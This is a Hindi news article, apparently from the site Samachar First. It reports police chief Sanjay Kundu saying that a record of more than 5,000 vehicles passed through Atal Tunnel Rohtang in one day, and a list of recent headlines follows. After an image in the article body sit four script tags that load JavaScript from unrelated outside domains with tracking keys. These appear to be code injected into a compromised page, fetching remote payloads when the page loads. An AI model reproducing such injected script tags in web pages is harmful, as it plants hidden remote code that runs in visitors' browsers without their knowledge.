Categories: हिमाचल

रविवार को अटल टनल रोहतांग से 5 हजार से अधिक वाहनों की आवाजाही

<p>अटल टनल रोहतांग के लिए भारी संख्या में आने वाले पर्यटकों की सुविधा के दृष्टिगत राज्य पुलिस ने मनाली से लाहौल स्पीति तक यातायात की सुचारू आवाजाही के लिए व्यापक प्रबन्ध किए हैं। पुलिस महानिदेशक संजय कुंडू ने कहा कि राज्य पुलिस ने पर्यटक वाहनों की भारी आवाजाही का बेहतरीन तरीके से प्रबन्ध किया है और यह सुनिश्चित किया जा रहा है कि देश के विभिन्न भागों से यहां आने वाले पर्यटकों को किसी असुविधा का सामना न करना पड़े।</p>

<p>उन्होंने कहा कि रविवार को अटल टनल रोहतांग में दोनों छोर पर 5 हजार से अधिक वाहनों का आवागमन हुआ। यह एक दिन में यहां आने वाले वाहनों का आज तक का सर्वाधिक आंकड़ा रहा। लाहौल स्पीति की ओर से 2,800 वाहनों का आवागमन पंजीकृत किया गया जबकि लाहौल स्पीति से 2,650 वाहन मनाली की ओर आए। सिस्सू हैलीपैड पार्किंग क्षेत्र में अभी भी 200 से अधिक वाहन हैं।</p>

<p>संजय कुंडू ने कहा कि अटल टनल रोहतांग बहुत की कम अवधि में देशभर में प्रमुख पर्यटक गंतव्य बनकर उभरा है। पर्यटक बर्फ से आच्छादित लाहौल घाटी को देखने के लिए उमड़ रहे हैं और अटल टनल रोहतांग में विशेष रूचि दिखा रहे हैं। पुलिस विभाग ने यहां यातायात के सुचारू प्रबन्धन के लिए विशेष प्रबन्ध किए हैं। यह सुनिश्चित किया जा रहा है कि यहां से गुजरने वाले लोगों को किसी भी प्रकार की असुविधा का सामना न करना पड़े और पर्यटक यहां से मधुर स्मृतियों के साथ वापिस लौटें।</p>

<p><img src=”/media/gallery/images/image(1830).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1609122426645″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

विक्रमादित्य की चेतावनी: कंगना माफी मांगें, वरना मानहानि का सामना करें

  Shimla: मंडी से सांसद कंगना रनौत के बयान पर मंत्री विक्रमादित्य सिंह पलटवार किया…

2 hours ago

सामान्य से 3.2 डिग्री अधिक तापमान, 26 तारीख से बारिश की उम्मीद

  Shimla: प्रदेश में बीते 3 दिन से सूरज चमक रहा है। इससे सितंबर माह…

3 hours ago

शिमला-बिलासपुर हाईवे पर भूस्खलन, यातायात प्रभावित

Solan: शिमला-बिलासपुर राष्ट्रीय राजमार्ग-205 पर दाड़लाघाट के कराड़ाघाट के समीप साफ मौसम में ही पहाड़ी…

4 hours ago

PCC Meeting: सीएम की उपस्थिति पर संशय, डिप्टी सीएम नहीं होंगे

Shimla:कांग्रेस अध्यक्ष प्रतिभा सिंह ने प्रदेश कांग्रेस कमेटी कुछ ही देर में कांग्रेस भवन में…

4 hours ago

शिमला में छुट्टियां बीताकर सोनिया और राहुल लौटे, अब दिल्ली की राह

Shimla: हिमाचल की राजधानी शिमला के मशोबरा में छुट्टियां बीताकर आज सुबह सोनिया गांधी और…

4 hours ago

सितम्बर 23 का राशिफल, क्या कहती हैं आपकी राशि?

आज का राशिफल 23 सितम्बर 2024 , सोमवार मेष🐐 (चू, चे, चो, ला, ली, लू,…

5 hours ago